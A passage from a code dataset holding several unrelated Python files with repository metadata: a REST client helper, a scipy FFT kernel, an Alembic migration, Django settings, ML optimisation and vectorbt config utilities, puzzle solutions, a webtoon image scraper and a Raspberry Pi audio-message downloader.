res = self._interpret_returned_request(res, frmt)
return res
except Exception:
return None
def _interpret_returned_request(self, res, frmt):
# must be a Response
if isinstance(res, Response) is False:
return res
# if a response, there is a status code that should be ok
if not res.ok:
reason = res.reason
self.logging.warning("status is not ok with {0}".format(reason))
return res.status_code
if frmt == "json":
try:
return res.json()
except:
return res
# finally
return res.content
def _apply(self, iterable, fn, *args, **kwargs):
return [fn(x, *args, **kwargs) for x in iterable if x is not None]
def _get_async(self, keys, frmt='json', params={}):
        # does not work under python3 so local import
import grequests
session = self._get_session()
try:
# build the requests
urls = self._get_all_urls(keys, frmt)
self.logging.debug("grequests.get processing")
rs = (grequests.get(url, session=session, params=params) for key,url in zip(keys, urls))
# execute them
self.logging.debug("grequests.map call")
ret = grequests.map(rs, size=min(self.settings.CONCURRENT, len(keys)))
self.last_response = ret
self.logging.debug("grequests.map call done")
return ret
except Exception as err:
self.logging.warning("Error caught in async. " + err.message)
return []
def _get_all_urls(self, keys, frmt=None):
return ('%s/%s' % (self.url, query) for query in keys)
def get_async(self, keys, frmt='json', params={}, **kargs):
ret = self._get_async(keys, frmt, params=params, **kargs)
return self._apply(ret, self._interpret_returned_request, frmt)
def get_sync(self, keys, frmt='json', **kargs):
return [self.get_one(key, frmt=frmt, **kargs) for key in keys]
def http_get(self, query, frmt='json', params={}, **kargs):
"""
* query is the suffix that will be appended to the main url attribute.
* query is either a string or a list of strings.
* if list is larger than ASYNC_THRESHOLD, use asynchronous call.
"""
if isinstance(query, list) and len(query) > self.settings.ASYNC_THRESHOLD:
self.logging.debug("Running async call for a list")
return self.get_async(query, frmt, params=params, **kargs)
if isinstance(query, list) and len(query) <= self.settings.ASYNC_THRESHOLD:
self.logging.debug("Running sync call for a list")
return [self.get_one(key, frmt, params=params, **kargs) for key in query]
#return self.get_sync(query, frmt)
# OTHERWISE
self.logging.debug("Running http_get (single call mode)")
#return self.get_one(**{'frmt': frmt, 'query': query, 'params':params})
return self.get_one(query, frmt, params=params, **kargs)
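    # Minimal usage sketch (the endpoint and suffixes are illustrative and
    # depend on the wrapped service):
    #
    #   s = REST("test", "https://www.ebi.ac.uk/chemblws")
    #   one = s.http_get("targets/CHEMBL2476.json", frmt="json")          # single call
    #   many = s.http_get(["targets/CHEMBL2476.json"] * 30, frmt="json")  # async batch
    #
    # Lists longer than settings.ASYNC_THRESHOLD are dispatched through
    # get_async(); shorter lists fall back to one get_one() call per item.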
def get_one(self, query, frmt='json', params={}, **kargs):
"""
if query starts with http:// do not use self.url
"""
if query is None:
url = self.url
else:
if query.startswith("http"):
                # the full URL was given; do not prepend self.url
url = query
else:
url = '%s/%s' % (self.url, query)
self.logging.debug(url)
try:
kargs['params'] = params
kargs['timeout'] = self.TIMEOUT
#res = self.session.get(url, **{'timeout':self.TIMEOUT, 'params':params})
res = self.session.get(url, **kargs)
self.last_response = res
res = self._interpret_returned_request(res, frmt)
try:
# for python 3 compatibility
res = res.decode()
except:
pass
return res
except Exception as err:
print(err)
print("Issue while Your current timeout is {0}. Consider increasing it with"\
"settings.TIMEOUT attribute".format(self.settings.TIMEOUT))
def http_post(self, query, params=None, data=None,
frmt='xml', headers=None, files=None, **kargs):
# query and frmt are bioservices parameters. Others are post parameters
# NOTE in requests.get you can use params parameter
# BUT in post, you use data
# only single post implemented for now unlike get that can be asynchronous
# or list of queries
if headers is None:
headers = {}
headers['User-Agent'] = self.getUserAgent()
headers['Accept'] = self.content_types[frmt]
self.logging.debug("Running http_post (single call mode)")
kargs.update({'query':query})
kargs.update({'headers':headers})
kargs.update({'files':files})
kargs.update({'params':params})
kargs.update({'data':data})
kargs.update({'frmt':frmt})
return self.post_one(**kargs)
def post_one(self, query, frmt='json', **kargs):
if query is None:
url = self.url
else:
url = '%s/%s' % (self.url, query)
self.logging.debug(url)
try:
res = self.session.post(url, **kargs)
self.last_response = res
res = self._interpret_returned_request(res, frmt)
try:
return res.decode()
except:
return res
except Exception as err:
print(err)
return None
def getUserAgent(self):
self.logging.info('getUserAgent: Begin')
urllib_agent = 'Python-requests/%s' % requests.__version__
#clientRevision = ''
clientVersion = ''
user_agent = 'EBI-Sample-Client/%s (%s; Python %s; %s) %s' % (
clientVersion, os.path.basename(__file__),
platform.python_version(), platform.system(),
urllib_agent
)
self.logging.info('getUserAgent: user_agent: ' + user_agent)
self.logging.info('getUserAgent: End')
return user_agent
def get_headers(self, content='default'):
"""
        :param str content: set to 'default', that is application/x-www-form-urlencoded,
so that it has the same behaviour as urllib2 (Sept 2014)
"""
headers = {}
headers['User-Agent'] = self.getUserAgent()
headers['Accept'] = self.content_types[content]
headers['Content-Type'] = self.content_types[content]
#"application/json;odata=verbose" required in reactome
#headers['Content-Type'] = "application/json;odata=verbose" required in reactome
return headers
def debug_message(self):
print(self.last_response.content)
print(self.last_response.reason)
print(self.last_response.status_code)
| [
"[email protected]"
] | |
15eb72ad636edbf32a27501814ebe6ead6ccc591 | 3c750d4d60660fdf6ef84d7b7ab9663fb76d0fa1 | /sopht/numeric/eulerian_grid_ops/poisson_solver_2d/scipy_fft_2d.py | c27c75ab0c351c35f8a07f4cc81135a2084dd26a | [
"MIT"
] | permissive | SophT-Team/SophT | 25d157a17734600e9aa4f522b4574bfefe202bc7 | 99a094e0d6e635e5b2385a69bdee239a4d1fb530 | refs/heads/main | 2023-08-31T21:14:10.304592 | 2023-08-31T17:00:38 | 2023-08-31T17:00:38 | 498,451,510 | 2 | 2 | MIT | 2023-09-12T15:37:31 | 2022-05-31T18:25:12 | Python | UTF-8 | Python | false | false | 457 | py | """Create reference FFT operations via scipy in 2D."""
import numpy as np
from scipy.fft import irfftn, rfftn
def fft_ifft_via_scipy_kernel_2d(
fourier_field: np.ndarray,
inv_fourier_field: np.ndarray,
field: np.ndarray,
num_threads: int = 1,
) -> None:
"""Perform reference FFT operations via scipy."""
fourier_field[...] = rfftn(field, workers=num_threads)
inv_fourier_field[...] = irfftn(fourier_field, workers=num_threads)
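# Minimal usage sketch (sizes are illustrative; for a real 2D field of shape
# (ny, nx), scipy's rfftn output has shape (ny, nx // 2 + 1)):
#
#   ny, nx = 8, 16
#   field = np.random.rand(ny, nx)
#   fourier_field = np.zeros((ny, nx // 2 + 1), dtype=np.complex128)
#   inv_fourier_field = np.zeros_like(field)
#   fft_ifft_via_scipy_kernel_2d(fourier_field, inv_fourier_field, field)
#   # inv_fourier_field now matches field up to floating-point round-off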
| [
"[email protected]"
] | |
0856f6a1b38760b3161698bc0ef30a8a3bca0ed4 | 360c777a2b77be466b1cf7c8fd74d6fd04f56b55 | /migrations/versions/7844211fb55_.py | 7d304f72a21244221e00963d026d4463433f0936 | [
"MIT"
] | permissive | hreeder/nexus-auth | 790a3b2623ddf443138a4b0f0af1380dbc4db8ae | 8d51aef01647e32ba4a284f02de73a2caad7cf49 | refs/heads/master | 2021-01-10T10:08:37.190558 | 2016-02-29T12:27:21 | 2016-02-29T12:27:21 | 52,789,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | """empty message
Revision ID: 7844211fb55
Revises: c5242907c1e
Create Date: 2014-07-30 10:23:03.502189
"""
# revision identifiers, used by Alembic.
revision = '7844211fb55'
down_revision = 'c5242907c1e'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('character', sa.Column('lastKnownShip', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('character', 'lastKnownShip')
### end Alembic commands ###
| [
"[email protected]"
] | |
cf7ab34a660f56433f5b54ab6324670467ea001f | 214dbac428fc8ad18d8775cd3ffd744068a77d24 | /my_django_app/settings.py | 9cc596a67ddf070aaa58ab4421bb25e912c69226 | [] | no_license | nsalahdeen/DjangoProject | 879c609fd5b53cf4be3a0ff5358d70adfbebbcf7 | 65a1bdcddb719e27ca67cd12aa47171f50370036 | refs/heads/main | 2023-04-20T04:25:20.608614 | 2021-05-04T15:51:50 | 2021-05-04T15:51:50 | 364,306,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,341 | py | """
Django settings for my_django_app project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = str(os.getenv('SECRET_KEY'))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'my_first_django_app', #my firstApp
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'my_django_app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
"/templates", Path.joinpath(BASE_DIR, "templates")
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'my_django_app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
e572940f400c4443799befdb71ed04fca2b087fd | 0305c23d48ee6e17722124aed5f90f55f1a2f5ef | /examples/lightgbm_examples/classification.py | 9924b8bca54a03c1e353420d2547fd5d7404cf68 | [
"MIT"
] | permissive | mdjabc/hyperparameter_hunter | d20a01fa6a3493fdbb595f8b5615a9d9ff398770 | bfbd1faf63272a62e6f971d7e9a0487d71aea8f6 | refs/heads/master | 2020-05-16T01:39:39.275129 | 2019-04-02T01:16:30 | 2019-04-02T01:16:30 | 182,608,190 | 1 | 0 | MIT | 2019-04-22T02:21:50 | 2019-04-22T02:21:49 | null | UTF-8 | Python | false | false | 2,453 | py | from hyperparameter_hunter import Environment, CVExperiment
from hyperparameter_hunter import RandomForestOptimization, Real, Integer, Categorical
import pandas as pd
from sklearn.datasets import fetch_covtype
from sklearn.metrics import f1_score
from lightgbm import LGBMClassifier
#################### Format DataFrame ####################
# Be advised, this dataset (SKLearn's Forest Cover Types) can take a little while to download...
# This is a multi-class classification task, in which the target is label-encoded.
data = fetch_covtype(shuffle=True, random_state=32)
train_df = pd.DataFrame(data.data, columns=["x_{}".format(_) for _ in range(data.data.shape[1])])
train_df["y"] = data.target
#################### Set Up Environment ####################
env = Environment(
train_dataset=train_df,
results_path="HyperparameterHunterAssets",
target_column="y",
metrics=dict(f1=lambda y_true, y_pred: f1_score(y_true, y_pred, average="micro")),
cv_type="StratifiedKFold",
cv_params=dict(n_splits=5, random_state=32),
)
# Now that HyperparameterHunter has an active `Environment`, we can do two things:
#################### 1. Perform Experiments ####################
experiment = CVExperiment(
model_initializer=LGBMClassifier,
model_init_params=dict(boosting_type="gbdt", num_leaves=31, max_depth=-1, subsample=0.5),
model_extra_params=dict(
fit=dict(
feature_name=train_df.columns.values[:-1].tolist(),
categorical_feature=train_df.columns.values[11:-1].tolist(),
)
),
)
# And/or...
#################### 2. Hyperparameter Optimization ####################
optimizer = RandomForestOptimization(iterations=10, random_state=32)
optimizer.set_experiment_guidelines(
model_initializer=LGBMClassifier,
model_init_params=dict(
boosting_type=Categorical(["gbdt", "dart"]),
num_leaves=Integer(10, 40),
max_depth=-1,
subsample=Real(0.3, 0.7),
),
model_extra_params=dict(
fit=dict(
feature_name=train_df.columns.values[:-1].tolist(),
categorical_feature=train_df.columns.values[11:-1].tolist(),
)
),
)
optimizer.go()
# Notice, `optimizer` recognizes our earlier `experiment`'s hyperparameters fit inside the search
# space/guidelines set for `optimizer`.
# Then, when optimization is started, it automatically learns from `experiment`'s results
# - without any extra work for us!
| [
"[email protected]"
] | |
7f8d4393203d77170ee56f9dc35fd118af389dbf | 69d8f3cf7c10640a692fa9175f5a63a5a7b54fcd | /naver_webtoon.py | 2a03516c541bf495641c72d69deb1ef931d4df67 | [] | no_license | baidoosik/crawling | bd89fd9f59ecb8921e765b03faadf1c55bd59c74 | 62669badf6ce84e0ac9e575b736e41051642ea9c | refs/heads/master | 2021-06-21T19:25:30.175798 | 2017-07-30T15:02:55 | 2017-07-30T15:02:55 | 84,198,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,083 | py | from crawling import *
def naver_webtoon(url):
ep_headers = {
'referer': 'http://comic.naver.com/webtoon/'
}
html = req.get(url, headers=ep_headers).text
soup = bfs(html, 'html.parser')
webtoon_name = ''.join(soup.select('div.detail h2')[0].text.split())
ep_name = soup.select('.tit_area h3')[0].text
result = []
n_result = []
file_list = []
max_width, max_height = 0, 0
for tag in soup.select('#comic_view_area img'):
try:
print(tag['src'])
result.append(tag['src'])
except KeyError:
            print('Finished crawling the required data')
break
for img_url in result:
print(img_url)
if re.match(r'^http.*$', img_url):
n_result.append(img_url)
for img_url in n_result:
img = req.get(img_url, headers=ep_headers).content
img_name = os.path.basename(img_url)
img_path = os.path.join(webtoon_name, ep_name, img_name)
dir_path = os.path.dirname(img_path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
if os.path.exists(img_path):
pass
else:
with open(img_path, 'wb') as f:
f.write(img)
file_list.append(img_path)
for img_url in file_list:
with Image.open(img_url) as im:
if max_width < im.width:
max_width = im.width
max_height = max_height + im.height
size = (max_width, max_height)
white = (255, 255, 255)
    now = math.ceil(time.time())
with Image.new('RGB', size, white) as canvas:
height = 0
for filename in file_list:
with Image.open(filename) as im:
canvas.paste(im, box=(0, height))
height = height + im.height
canvas.save('{}.png'.format(now))
if __name__ == '__main__':
    print('Please enter the URL of the webtoon you want!')
    req_url = input()
    print('Turning the requested webtoon into a single image!')
naver_webtoon(req_url) | [
"[email protected]"
] | |
c63011b271a1d1a905c1b4a064dc8fb4dfb1f928 | c957b4663cc4cb21e5172f23c6989031be8c3e5b | /python/830. Positions of Large Groups.py | a1f9bf5b13cad44b7186ef6646eebc9f05be1547 | [] | no_license | gajanlee/leetcode | e061dc37af0f83bf2bce00c391c0b8a9f3177b22 | 0d3c8477f05604a059e58a8764ce0d8bd418edde | refs/heads/master | 2018-12-26T06:12:24.995542 | 2018-10-30T05:03:27 | 2018-10-30T05:03:27 | 102,965,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | """
In a string S of lowercase letters, these letters form consecutive groups of the same character.
For example, a string like S = "abbxxxxzyy" has the groups "a", "bb", "xxxx", "z" and "yy".
Call a group large if it has 3 or more characters. We would like the starting and ending positions of every large group.
The final answer should be in lexicographic order.
Example 1:
Input: "abbxxxxzzy"
Output: [[3,6]]
Explanation: "xxxx" is the single large group with starting 3 and ending positions 6.
Example 2:
Input: "abc"
Output: []
Explanation: We have "a","b" and "c" but no large group.
Example 3:
Input: "abcdddeeeeaabbbcd"
Output: [[3,5],[6,9],[12,14]]
Note: 1 <= S.length <= 1000
"""
class Solution:
def largeGroupPositions(self, S):
"""
:type S: str
:rtype: List[List[int]]
"""
res = []
S += "#"
last = "$"
start = end = 0
for i, s in enumerate(S):
if s == last:
end += 1
elif end - start >= 2:
res.append([start, end])
start = end = i
else:
start = end = i
last = s
return res
        # Alternative one-liner (unreachable above because `res` was already
        # returned; it also needs `import re`):
        # \1 back-references the first capture group (the repeated character)
        # {2,} requires at least two further repeats, i.e. a run of length >= 3
        return [[r.start(), r.end() - 1] for r in re.finditer(r'(\w)\1{2,}', S)] | [
"[email protected]"
] | |
26fb69f33707a68a52b9cf096ecea4d441b19610 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /9QbhjtbkXp3QZNuDu_4.py | 0fdb756be15b9bb5f9a2c994e4cc0739f8aa07b5 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | """
In this challenge, you have to find the last 15 palindromes of all numbers
starting from ten and up to a given limit, including the limit in the search.
Given an integer `limit` being the upper limit of the range of interest,
implement a function that returns the last 15 palindromes numbers lower **or
equal** to `limit` as a list sorted ascendingly.
### Examples
generate_palindromes(151) ➞ [
11, 22, 33, 44, 55,
66, 77, 88, 99, 101,
111, 121, 131, 141, 151
]
generate_palindromes(600) ➞ [
454, 464, 474, 484, 494,
505, 515, 525, 535, 545,
555, 565, 575, 585, 595
]
generate_palindromes(999999) ➞ [
985589, 986689, 987789, 988889, 989989,
990099, 991199, 992299, 993399, 994499,
995599, 996699, 997799, 998899, 999999
]
### Notes
N/A
"""
def generate_palindromes(limit):
    is_pal = lambda n: str(n) == str(n)[::-1]
    ans = []
    while len(ans) < 15:
        if is_pal(limit):
            ans = [limit] + ans
        limit -= 1
    return ans
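# Quick checks against the examples above (illustrative):
#   generate_palindromes(151)[-3:]  -> [131, 141, 151]
#   generate_palindromes(600)[0]    -> 454
#   len(generate_palindromes(600))  -> 15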
| [
"[email protected]"
] | |
8513a8e7ee09df250f1ac7d1b06dc0a64cd08208 | 2a6f4b01b5ef2729eef6b24cba926f90edace478 | /vectorbt/utils/config.py | 3ae73a71793ae3c6a482ea095078ea8b9839342b | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | nehcuh/vectorbt | c8c413f11a8e1503f75477e41fc30127c1300236 | c0f307169b19a0f26c1992a9e29f4be380c1b220 | refs/heads/master | 2023-04-11T14:17:08.590766 | 2021-04-07T13:12:11 | 2021-04-07T13:12:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,664 | py | """Utilities for configuration."""
from copy import copy
from collections import namedtuple
import dill
import inspect
from vectorbt.utils import checks
from vectorbt.utils.attr import deep_getattr
def get_func_kwargs(func):
"""Get keyword arguments of the function."""
signature = inspect.signature(func)
return {
k: v.default
for k, v in signature.parameters.items()
if v.default is not inspect.Parameter.empty
}
class atomic_dict(dict):
"""Dict that behaves like a single value when merging."""
pass
def merge_dicts(*dicts):
"""Merge dicts."""
x, y = dicts[0], dicts[1]
if x is None:
x = {}
if y is None:
y = {}
checks.assert_type(x, dict)
checks.assert_type(y, dict)
if len(x) == 0:
z = y.copy()
elif len(y) == 0:
z = x.copy()
else:
z = {}
overlapping_keys = [k for k in x if k in y] # order matters
for k in overlapping_keys:
if isinstance(x[k], dict) and isinstance(y[k], dict) and not isinstance(y[k], atomic_dict):
z[k] = merge_dicts(x[k], y[k])
else:
z[k] = y[k]
for k in [k for k in x if k not in y]:
z[k] = x[k]
for k in [k for k in y if k not in x]:
z[k] = y[k]
if len(dicts) > 2:
return merge_dicts(z, *dicts[2:])
return z
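# Small illustration of the merge semantics (values are made up):
#
#   merge_dicts({'a': {'x': 1}}, {'a': {'y': 2}})
#   # -> {'a': {'x': 1, 'y': 2}}   nested dicts are merged key by key
#
#   merge_dicts({'a': {'x': 1}}, {'a': atomic_dict(y=2)})
#   # -> {'a': {'y': 2}}           an atomic_dict replaces the old value wholesale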
def copy_dict(dct):
"""Copy dict using shallow-deep copy hybrid.
Traverses all nested dicts and copies each value using shallow copy."""
dct_copy = dict()
for k, v in dct.items():
if isinstance(v, dict):
dct_copy[k] = copy_dict(v)
else:
dct_copy[k] = copy(v)
return dct_copy
_RaiseKeyError = object()
DumpTuple = namedtuple('DumpTuple', ('cls', 'dumps'))
class Pickleable:
"""Superclass that defines abstract properties and methods for pickle-able classes."""
def dumps(self, **kwargs):
"""Pickle to a string."""
raise NotImplementedError
@classmethod
def loads(cls, dumps, **kwargs):
"""Unpickle from a string."""
raise NotImplementedError
def save(self, fname, **kwargs):
"""Save dumps to a file."""
dumps = self.dumps(**kwargs)
with open(fname, "wb") as f:
f.write(dumps)
@classmethod
def load(cls, fname, **kwargs):
"""Load dumps from a file and create new instance."""
with open(fname, "rb") as f:
dumps = f.read()
return cls.loads(dumps, **kwargs)
class Config(dict, Pickleable):
"""Extends dict with config features."""
def __init__(self, *args, frozen=False, read_only=False, **kwargs):
super().__init__(*args, **kwargs)
self._frozen = frozen
self._read_only = read_only
self._init_config = copy_dict(self) if not read_only else None
@property
def frozen(self):
"""Whether this dict's keys are frozen."""
return self._frozen
@property
def read_only(self):
"""Whether this dict is read-only."""
return self._read_only
@property
def init_config(self):
"""Initial config."""
return self._init_config
def __setitem__(self, k, v):
if self.read_only:
raise TypeError("Config is read-only")
if self.frozen:
if k not in self:
raise KeyError(f"Key '{k}' is not valid")
super().__setitem__(k, v)
def __delitem__(self, k):
if self.read_only:
raise TypeError("Config is read-only")
super().__delitem__(k)
def pop(self, k, v=_RaiseKeyError):
if self.read_only:
raise TypeError("Config is read-only")
if v is _RaiseKeyError:
return super().pop(k)
return super().pop(k, v)
def popitem(self):
if self.read_only:
raise TypeError("Config is read-only")
return super().popitem()
def clear(self):
if self.read_only:
raise TypeError("Config is read-only")
return super().clear()
def update(self, *args, force_update=False, **kwargs):
other = dict(*args, **kwargs)
if force_update:
super().update(other)
return
if self.read_only:
raise TypeError("Config is read-only")
if self.frozen:
for k in other:
if k not in self:
raise KeyError(f"Key '{k}' is not valid")
super().update(other)
def copy(self):
return type(self)(self)
def merge_with(self, other, **kwargs):
"""Merge this and other dict into a new config."""
return self.__class__(merge_dicts(self, other), **kwargs)
def reset(self):
"""Reset to the initial config."""
if self.read_only:
raise TypeError("Config is read-only")
self.update(copy_dict(self.init_config), force_update=True)
def dumps(self, **kwargs):
"""Pickle to a string."""
config = dict(frozen=self.frozen, read_only=self.read_only)
for k, v in self.items():
            if k in ('frozen', 'read_only'):
raise ValueError(f"Keyword argument repeated: {k}")
if isinstance(v, Pickleable):
config[k] = DumpTuple(cls=v.__class__, dumps=v.dumps(**kwargs))
else:
config[k] = v
return dill.dumps(config, **kwargs)
@classmethod
def loads(cls, dumps, **kwargs):
"""Unpickle from a string."""
config = dill.loads(dumps, **kwargs)
for k, v in config.items():
if isinstance(v, DumpTuple):
config[k] = v.cls.loads(v.dumps, **kwargs)
return cls(**config)
def __eq__(self, other):
return checks.is_deep_equal(dict(self), dict(other))
class AtomicConfig(Config, atomic_dict):
"""Config that behaves like a single value when merging."""
pass
class Configured(Pickleable):
"""Class with an initialization config.
All operations are done using config rather than the instance, which makes it easier to pickle.
!!! warning
If the instance has writable attributes or depends upon global defaults,
their values won't be copied over. Make sure to pass them explicitly to
make the saved & loaded / copied instance resilient to changes in globals."""
def __init__(self, **config):
self._config = Config(config, read_only=True)
@property
def config(self):
"""Initialization config."""
return self._config
def copy(self, **new_config):
"""Create a new instance based on the config.
!!! warning
This "copy" operation won't return a copy of the instance but a new instance
initialized with the same config."""
return self.__class__(**self.config.merge_with(new_config))
def dumps(self, **kwargs):
"""Pickle to a string."""
return self.config.dumps(**kwargs)
@classmethod
def loads(cls, dumps, **kwargs):
"""Unpickle from a string."""
return cls(**Config.loads(dumps, **kwargs))
def __eq__(self, other):
"""Objects are equal if their configs are equal."""
if type(self) != type(other):
return False
return self.config == other.config
def getattr(self, attr_chain):
"""See `vectorbt.utils.attr.deep_getattr`."""
return deep_getattr(self, attr_chain)
def update_config(self, *args, **kwargs):
"""Force-update the config."""
self.config.update(*args, **kwargs, force_update=True)
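# Minimal sketch of the intended subclassing pattern (names are illustrative,
# not actual classes from this package):
#
#   class MyIndicator(Configured):
#       def __init__(self, window=14, alpha=0.5):
#           super().__init__(window=window, alpha=alpha)
#
#   ind = MyIndicator(window=20)
#   ind2 = ind.copy(alpha=0.9)               # new instance from the merged config
#   restored = MyIndicator.loads(ind.dumps())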
| [
"[email protected]"
] | |
01e300e4ad3f48c320b5035e476c2a1eefe88cf8 | 75bb245280a749fcb1a74e94a62b78e4ceed16f0 | /message_manager.py | 6157da0ba6e39a61f90304e3c8d370c579e628bd | [] | no_license | cjlavan/rpi_set_wifi | 72cee2a8e4531b52398ff28f2abec47a269202d6 | 7600d05d8c9fa0d6c96663e3e86ca33095f56e0b | refs/heads/master | 2016-09-10T20:45:02.874265 | 2015-05-11T00:30:19 | 2015-05-11T00:30:19 | 35,393,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,989 | py | import requests
import os
import os.path
import json
from unipath import Path
import datetime
import time
import wget
import _SETTINGS
import convert
from message_queue import message_queue
class message_manager:
def __init__(self):
self.new_messages = False
self.BASE_DIR = os.path.dirname(os.path.abspath(__file__))
self.OUTPUT_DIR = Path(self.BASE_DIR).child('audio_output')
os.chdir(self.OUTPUT_DIR)
convert.remove_files(self.OUTPUT_DIR)
self.latest_id = int(self.get_latest_msg_id_json())
self.new_messages = False
self.MessageList = []
self.load_stored_message_json()
self.DownloadMessageList = []
self.post_download_message_json()
if self.new_messages:
self.alert_new_messages()
self.download_audio()
self.new_messages = False
def update_loop(self):
while True:
convert.remove_files(self.OUTPUT_DIR)
self.post_download_message_json()
if self.new_messages:
self.alert_new_messages()
self.download_audio()
self.new_messages = False
convert.remove_files(self.OUTPUT_DIR)
time.sleep(10)
# loads the initial json file to compare to what will be downloaded
# reads the initial json file and converts it to a list of message objects
def load_stored_message_json(self):
os.chdir(self.OUTPUT_DIR)
len_mes = 0
try:
jsonData = open('stored_message_data.json')
stored_data = json.load(jsonData)
len_mes = len(stored_data)
jsonData.close()
except:
with open('stored_message_data.json', 'w') as f:
json.dump([], f)
f.close()
self.MessageList = []
print "length of len_mes: " + str(len_mes)
for x in range (0,len_mes):
m = {
'msg_id' : stored_data[x]["msg_id"],
'audio_file' : stored_data[x]["audio_file"],
'path' : self.OUTPUT_DIR,
'color' : stored_data[x]["color"],
'ts' : stored_data[x]["ts"],
'played' : stored_data[x]["played"]
}
self.MessageList.append(m)
# print "appened message list with " + str(m['msg_id'])
# posts to server reads incoming json into download message list
def post_download_message_json(self):
Downloaded_messages_json = (requests.post(_SETTINGS.url, data=json.dumps(_SETTINGS.payload))).text
Downloaded_messages_json = json.loads(Downloaded_messages_json)
settings = json.dumps(Downloaded_messages_json["settings"])
i = len(Downloaded_messages_json["data"])
with open("config.json","w") as myfile:
myfile.write(settings)
myfile.close()
lookup_marker = 0
for x in range (i-1, 0, -1):
if int(Downloaded_messages_json["data"][x]["msg_id"]) > self.latest_id:
Downloaded_messages_json["data"][x].update({
'ts': str(json.dumps(datetime.datetime.now(),
default=self.get_iso_format))
})
m = {
'msg_id' : Downloaded_messages_json["data"][x]["msg_id"],
'audio_file' : "",
'download_link' : Downloaded_messages_json["data"][x]["audio_file"],
'path' : self.OUTPUT_DIR,
'color' : Downloaded_messages_json["data"][x]["color"],
'ts' : Downloaded_messages_json["data"][x]["ts"],
'played' : 0,
}
self.new_messages = True
self.DownloadMessageList.append(m)
# downloads audio for DownloadMessageList
def download_audio(self):
os.chdir(self.OUTPUT_DIR)
i = len(self.DownloadMessageList)
for x in range (0,i):
message = self.DownloadMessageList[0]
while not self.is_okay_to_work():
time.sleep(10)
local_file_name = wget.download(message['download_link'])
message['audio_file'] = local_file_name
self.save_new_message(message)
self.DownloadMessageList.remove(message)
# checks to see if messages are being played
# if no, then saves messages that has just been downloaded
def save_new_message(self, message):
while not self.is_okay_to_work():
time.sleep(10)
convert.convert(self.OUTPUT_DIR)
self.MessageList.append(message)
if int(message['msg_id']) > self.latest_id:
self.latest_id = int(message['msg_id'])
self.write_message_data()
def write_message_data(self):
os.chdir(self.OUTPUT_DIR)
        while not self.is_okay_to_work():
time.sleep(10)
with open("stored_message_data.json","w") as output_file:
output_string = json.dumps(self.MessageList)
output_file.write(output_string)
output_file.close()
self.set_latest_msg_id_json()
# helper methods
# returns iso format time stamp
def get_iso_format(self, obj):
if hasattr(obj, 'isoformat'):
return obj.isoformat()
else:
            raise TypeError('Object of type %s with value of %s is not JSON serializable'
                            % (type(obj), repr(obj)))
def alert_new_messages(self):
os.chdir(self.OUTPUT_DIR)
with open('new_message_status.json',"w") as f:
json.dump({'new_info':1}, f)
f.close()
def get_status_json(self):
os.chdir(self.OUTPUT_DIR)
try:
with open('player_status.json') as f:
data = json.load(f)
f.close()
return data['status']
except:
